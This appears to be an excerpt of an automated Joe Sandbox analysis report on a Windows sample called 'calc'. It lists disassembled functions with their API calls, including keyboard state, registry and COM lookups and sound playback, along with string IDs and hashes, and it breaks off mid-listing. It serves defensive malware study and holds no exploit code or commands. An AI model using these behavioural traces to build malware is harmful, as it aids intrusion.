    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Library$Free$AddressLoadProc$CloseHandle$OpenProcess
    • String ID:
    • API String ID: 2673135774-0
    • Opcode ID: 311c7b7e15e48ed5ba98a5f988153cfb860ee31c7699df57d0feb0eeaaa9edc2
    • Instruction ID: b58e278ce73e61c3bd0addc224ce89628fbce7a2dc744801581c9458643eb4d8
    • Opcode Fuzzy Hash: 311c7b7e15e48ed5ba98a5f988153cfb860ee31c7699df57d0feb0eeaaa9edc2
    • Instruction Fuzzy Hash: BAD1D872D00219EBDF11EFA5CC819DEB7B8AF08304F1540ABE905B7151DB78AE858B99
    Function 004126BC Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 169windowsleepCOMMON
    Download Yara Rule
    APIs
    • GetMenuItemInfoW.USER32(0047A6A8,000000FF,00000000,0000002C), ref: 0041272A
    • SetMenuItemInfoW.USER32(0047A6A8,00000004,00000000,0000002C), ref: 00412760
    • Sleep.KERNEL32(000001F4,0047A6A8,?,00000000), ref: 00412771
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: InfoItemMenu$Sleep
    • String ID: ,
    • API String ID: 1196289194-3772416878
    • Opcode ID: 840733704e8b72faa693b97eaa8618e70ee49a5f4cbdb18606633d748c6003fc
    • Instruction ID: 673f1c98b9e666d0017e1a7833c8b8cc34a90406b02290c59e1f383dc2874613
    • Opcode Fuzzy Hash: 840733704e8b72faa693b97eaa8618e70ee49a5f4cbdb18606633d748c6003fc
    • Instruction Fuzzy Hash: 5D51B670904208EFEF11DF94CA84AEEBBB4BF00308F24415EE551E2291D3B89EE5DB19
    Function 004305B5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 143registryCOMMON
    Download Yara Rule
    APIs
    • StringFromIID.OLE32(?,?), ref: 004305D5
    • CoTaskMemFree.OLE32(?,\TypeLib,00000000,?,?), ref: 00430627
    • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0043063F
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0043066D
    • CLSIDFromString.OLE32(00000000,?), ref: 0043069C
    • RegQueryValueExW.ADVAPI32(?,Version,00000000,00000000,?,00000001), ref: 004306D1
    • LoadRegTypeLib.OLEAUT32(?,00000000,00000000), ref: 00430724
    • RegCloseKey.ADVAPI32(?), ref: 0043074D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: FromQueryStringValue$CloseFreeLoadOpenTaskType
    • String ID: Version$\TypeLib$interface\
    • API String ID: 3215668907-939221531
    • Opcode ID: 3654618434424b097fae0dc36161773e31ff03675085335a622b0cde49f7a969
    • Instruction ID: b655124fc70be52ddb42d0f67ed840a6ab8a9596b0c865405af6a81620bfd038
    • Opcode Fuzzy Hash: 3654618434424b097fae0dc36161773e31ff03675085335a622b0cde49f7a969
    • Instruction Fuzzy Hash: AC416076800118EBCF10EBA5DC89CDEBBB8FF48315F11056AF915A3161DB349E44DB64
    Function 004108E0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128keyboardCOMMON
    Download Yara Rule
    APIs
    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041090B
    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410916
    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410924
    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410932
    • MapVirtualKeyW.USER32(00000011,00000000), ref: 0041093D
    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410948
    • GetKeyboardLayoutNameA.USER32(?), ref: 00410954
    • VkKeyScanA.USER32(00000000), ref: 00410968
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Virtual$KeyboardLayoutNameScan
    • String ID: 0002$0409$0809
    • API String ID: 983989243-2507973371
    • Opcode ID: e26775cac1d69ddc040335cf172753ea57e0579228d91fe694fe3cb24bc9a97e
    • Instruction ID: bec2c5736e6295f485510cdfee5d2b4694b43ecfdd9fd1275449d8d207afea38
    • Opcode Fuzzy Hash: e26775cac1d69ddc040335cf172753ea57e0579228d91fe694fe3cb24bc9a97e
    • Instruction Fuzzy Hash: 4241F971549388ACF720EBB95C0AB977BD89F61309F14006BE594D7183E6FCA488871E
    Function 00415B6C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
    Download Yara Rule
    APIs
    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00415BDA
    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00415BEE
    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00415BFE
    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00415C11
    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00415C1E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: SendString
    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
    • API String ID: 890592661-1007645807
    • Opcode ID: 027e6a833893cbb96524b15b47c0957c4f0472fca9c4ae83e66977fab9240e5a
    • Instruction ID: b1822fddb4a767dec974c595ee76e1b150c2e2547c3de3647d388603338b342e
    • Opcode Fuzzy Hash: 027e6a833893cbb96524b15b47c0957c4f0472fca9c4ae83e66977fab9240e5a
    • Instruction Fuzzy Hash: A1119670D4020CBEEB10ABA1ECC1EEF7B7CDF44798F504167B410A2091E7A89E8486A9
    Function 004301FC Relevance: 18.2, APIs: 12, Instructions: 193COMMON
    Download Yara Rule
    APIs
    • VariantInit.OLEAUT32(-00000048), ref: 00430217
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: InitVariant
    • String ID:
    • API String ID: 1927566239-0
    • Opcode ID: ba28c3041cd4c6874d2c18b63d8c63254bd3445e0bfa78ee4fa0ae738adc1948
    • Instruction ID: 9d7999fc2cd5a7606b955a0f693963966027de556b63af81db066f69122e02aa
    • Opcode Fuzzy Hash: ba28c3041cd4c6874d2c18b63d8c63254bd3445e0bfa78ee4fa0ae738adc1948
    • Instruction Fuzzy Hash: C4618E31900214EBCB01DFA5CC989AEB7B4FF0C315F2096AAE815E7251DB78DE41DB59
    Function 004085D5 Relevance: 18.2, APIs: 12, Instructions: 180windowCOMMON
    Download Yara Rule
    APIs
    • SendMessageW.USER32(?,?,000000FF,00000000), ref: 004086B2
    • SendMessageW.USER32(?,?,00000000,00000000), ref: 004086C2
    • CharNextW.USER32(00000000,?,004276A0,00478410,00000000,?), ref: 004086EE
    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00408701
    • SendMessageW.USER32(?,?,00000000,?), ref: 00408715
    • SendMessageW.USER32(?,?,000000FF,00000000), ref: 00408742
    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00408756
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: MessageSend$CharNext
    • String ID:
    • API String ID: 1350042424-0
    • Opcode ID: fff3deafd34010b60cb4504be277448b5b9625619d6a58d1e5baea8988beab3d
    • Instruction ID: b12c777ac9d0b86c010d8e88b360e31c6d53ff0b2d7a97ce2183b31ba9e66b68
    • Opcode Fuzzy Hash: fff3deafd34010b60cb4504be277448b5b9625619d6a58d1e5baea8988beab3d
    • Instruction Fuzzy Hash: AB519E71600308EBDF219F64CE45BAA3BA5AF44314F24412FF9A4A62E1DB79DC52CF58
    Function 0040E741 Relevance: 18.2, APIs: 12, Instructions: 168COMMON
    Download Yara Rule
    APIs
    • GetDlgItem.USER32(?,00000001), ref: 0040E764
    • GetWindowRect.USER32(00000000,?), ref: 0040E77C
    • MoveWindow.USER32(00000001,0000000A,?,?,?,00000000), ref: 0040E7D4
    • GetDlgItem.USER32(?,00000002), ref: 0040E7DE
    • GetWindowRect.USER32(00000000,?), ref: 0040E7F0
    • MoveWindow.USER32(00000001,?,00000000,?,?,00000000), ref: 0040E842
    • GetDlgItem.USER32(?,000003E9), ref: 0040E84F
    • GetWindowRect.USER32(00000000,?), ref: 0040E861
    • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 0040E8A4
    • GetDlgItem.USER32(?,000003EA), ref: 0040E8AE
    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0040E8CA
    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040E8D3
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: Window$ItemMoveRect$Invalidate
    • String ID:
    • API String ID: 3096461208-0
    • Opcode ID: 3a1dcebfad33eec77ff6b25477c45e905561baac400562b15739efe02f938839
    • Instruction ID: 9b8544a1d6d145af6ded319fd2928cc87b79eb69e54e7660af3b66d43001a818
    • Opcode Fuzzy Hash: 3a1dcebfad33eec77ff6b25477c45e905561baac400562b15739efe02f938839
    • Instruction Fuzzy Hash: 7E5147B1E0020AAFDF04CFA9DD45AAEBBB9FB44311F14812AF515E7290E770AE00CB54
    Function 00410F35 Relevance: 18.2, APIs: 12, Instructions: 152keyboardCOMMON
    Download Yara Rule
    APIs
    • GetKeyboardState.USER32(00000001), ref: 00410FD3
    • SetKeyboardState.USER32(00000001), ref: 00411021
    • GetAsyncKeyState.USER32(00000011), ref: 00411035
    • GetKeyState.USER32(00000011), ref: 00411043
    • GetAsyncKeyState.USER32(00000012), ref: 00411064
    • GetKeyState.USER32(00000012), ref: 0041106D
    • GetAsyncKeyState.USER32(000000A0), ref: 00411093
    • GetKeyState.USER32(000000A0), ref: 0041109B
    • GetAsyncKeyState.USER32(000000A1), ref: 004110C0
    • GetKeyState.USER32(000000A1), ref: 004110C8
    • GetAsyncKeyState.USER32(0000005B), ref: 004110E9
    • GetKeyState.USER32(0000005B), ref: 004110F3
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: State$Async$Keyboard
    • String ID:
    • API String ID: 541375521-0
    • Opcode ID: 551dbde3f8065375312253c687410048079869a797f1a7c7e8a518f2e63a8ba4
    • Instruction ID: 0a29760dd22265b3d953272a9e43809e9e5c528ef8a2cbe6b81addde34154a84
    • Opcode Fuzzy Hash: 551dbde3f8065375312253c687410048079869a797f1a7c7e8a518f2e63a8ba4
    • Instruction Fuzzy Hash: 8D51D4306047859AEB349B34C94A7DB7AC09F19784F04041EEA8D973E2D7FC99C5C61D
    Function 00457A2F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 299COMMON
    Download Yara Rule
    APIs
    • CompareStringW.KERNEL32(00000000,00000000,00462758,00000001,00462758,00000001,0045C490,00000048,004571DF,0045DC34,00000001,?,00000000,00000002,00000000,?), ref: 00457A68
    • GetLastError.KERNEL32(?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0,0045BBD8,00000018,00452DFD,0045BBE8,00000008,0044BA23), ref: 00457A7E
    • GetCPInfo.KERNEL32(00000000,00452DFD,0045C490,00000048,004571DF,0045DC34,00000001,?,00000000,00000002,00000000,?,?,00455B83,00000000,?), ref: 00457B23
    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457BA6
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,?,0045BBD8,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457C22
    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000018,?,00000000,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457C3F
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000018,?,?,00000000,?,00455B83,00000000,?,00000000,00000000,00000000,00000000,0045282B,0045BBD0), ref: 00457CB5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: ByteCharMultiWide$CompareErrorInfoLastString
    • String ID: X'F
    • API String ID: 1773772771-3633639642
    • Opcode ID: e2c9197fe9afdc0141f13e0944e3e91d5a9f18aae4c45c5e37ece728ee7a4adc
    • Instruction ID: 7feb89906a43771ec33674e053c7b17ab4a961398231c0e5b273a939fe000d16
    • Opcode Fuzzy Hash: e2c9197fe9afdc0141f13e0944e3e91d5a9f18aae4c45c5e37ece728ee7a4adc
    • Instruction Fuzzy Hash: 45B1B131908209EFDF22DF54EC84BAE7BB6AF45346F24012BFC11A6252D7398D49CB59
    Function 00431152 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 205COMMON
    Download Yara Rule
    APIs
    • StringFromCLSID.OLE32(?,00000000), ref: 00431209
    • CoTaskMemFree.OLE32(00000000), ref: 00431225
    • StringFromIID.OLE32(?,00000000), ref: 0043130F
    • CoTaskMemFree.OLE32(00000000), ref: 00431327
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: FreeFromStringTask
    • String ID: CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32
    • API String ID: 910554386-2412192186
    • Opcode ID: 8e056a5b9435108c296a9f896b16c35f92d634f8bf4cd10e67201126eaa912f5
    • Instruction ID: 0b4f8b80ce955dd39e9ac8b4367f021f5a5185ffdf9ca56efeb76a6332b40596
    • Opcode Fuzzy Hash: 8e056a5b9435108c296a9f896b16c35f92d634f8bf4cd10e67201126eaa912f5
    • Instruction Fuzzy Hash: 88615B35A00208AFDB10EBA1CC85EEEB7B9EF08314F14455AF812E7261DB38E945DB58
    Function 00423BD7 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 201COMMON
    Download Yara Rule
    APIs
    • CharLowerBuffW.USER32(?,?,?,00000000,0045C6D0), ref: 00423C27
    • GetDriveTypeW.KERNEL32(?,00460454,00000061,unknown,ramdisk,network,fixed,removable,cdrom,all), ref: 00423D90
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: BuffCharDriveLowerType
    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown$z
    • API String ID: 2426244813-3835205858
    • Opcode ID: 970fd6aa8278aa1d55c201e174aa6171ddee745155343dd92589558c550e9979
    • Instruction ID: c943f114b9cfa34bc6d13cecd34174d1ce99e7829156bc061d10869983b5239c
    • Opcode Fuzzy Hash: 970fd6aa8278aa1d55c201e174aa6171ddee745155343dd92589558c550e9979
    • Instruction Fuzzy Hash: DA61E332E40225AACF20AF51EC426EEB771EF40715F51415FE91177192CB7C9E8A9A8C
    Function 0040ACC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 113windowCOMMON
    Download Yara Rule
    APIs
    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,000000FF,000000FF,000000FF,static,00000000,00000000,?,?,00000000), ref: 0040AD6A
    • 73A24C40.GDI32(00000000), ref: 0040AD84
    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0040AD95
    • SelectObject.GDI32(00000000,00000000), ref: 0040AD9D
    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0040ADA6
    • DeleteDC.GDI32(00000000), ref: 0040ADAF
    • 73A245F0.USER32(?,000000EC), ref: 0040ADBC
    • FreeLibrary.KERNEL32(?), ref: 0040ADE1
    • 73A25CF0.USER32(?,?,000000FF,000000FF,000000FF,static,00000000,00000000,?,?,00000000,00000000,?,00000000,00000000), ref: 0040ADED
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: A245DeleteFreeLibraryMessageMoveObjectPixelSelectSendWindow
    • String ID: static
    • API String ID: 3237436995-2160076837
    • Opcode ID: d591d34ae13dce0df897d2ae6259955c63a5f18172f723fdf8d5646ef0101bf3
    • Instruction ID: 46d34da8f58ca191638f5e8fa562867750dc08f6998696ef982bf1e62136dc5c
    • Opcode Fuzzy Hash: d591d34ae13dce0df897d2ae6259955c63a5f18172f723fdf8d5646ef0101bf3
    • Instruction Fuzzy Hash: 3B415C31400208FFCF119FA5DC48DDB3BB9EF89726B10426AF915A21A1D738CD61DB69
    Function 00430474 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 108registryCOMMON
    Download Yara Rule
    APIs
    • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 004304B7
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000028,00000000,00000000,00000000,?), ref: 004304DE
    • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?,00000000,?,interface\), ref: 00430524
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,000001FE), ref: 0043053D
    • IIDFromString.OLE32(00000000,00000000), ref: 00430572
    • RegCloseKey.ADVAPI32(?), ref: 0043057E
    • RegCloseKey.ADVAPI32(?), ref: 0043059C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.000000000047E000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664186396.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_calc.jbxd
    Similarity
    • API ID: CloseOpen$EnumFromQueryStringValue
    • String ID: ($interface$interface\
    • API String ID: 297354694-3327702407
    • Opcode ID: 9091e60cd04085e14176e606e39eb8294af4e8b9ced224e2ad05725c2beef0c1
    • Instruction ID: 465c8dba0b75a2b588b9d9a645616a4f636eb8d9ae8370a13ef1e90354eccf22
    • Opcode Fuzzy Hash: 9091e60cd04085e14176e606e39eb8294af4e8b9ced224e2ad05725c2beef0c1
    • Instruction Fuzzy Hash: DA412B7290021DFFEF10DBA0CC44AEEB7BCEB08315F20456AE910E2190D7399E449F28
    Function 0040D7FC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 80windowCOMMON
    Download Yara Rule
    APIs
    • GetFocus.USER32 ref: 0040D81B
    • IsChild.USER32(?,00000000), ref: 0040D82A
    • SendMessageW.USER32(?,00000087,00000000,00000000), ref: 0040D845
    • SendMessageW.USER32(?,00000087,00000000,00000000), ref: 0040D850
    • SendMessageW.USER32(?,000000B1,00000001,0000FFFF), ref: 0040D86B
    • SendMessageW.USER32(?,000000B1,00000000,FFFF0000), ref: 0040D883
    • GetDlgCtrlID.USER32(?), ref: 0040D892
    • GetDlgCtrlID.USER32(?), ref: 0040D8A4
    • SetFocus.USER32(?,00000008,00000000), ref: 0040D8C1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1664028640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.1664003706.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664071771.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1664094117.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
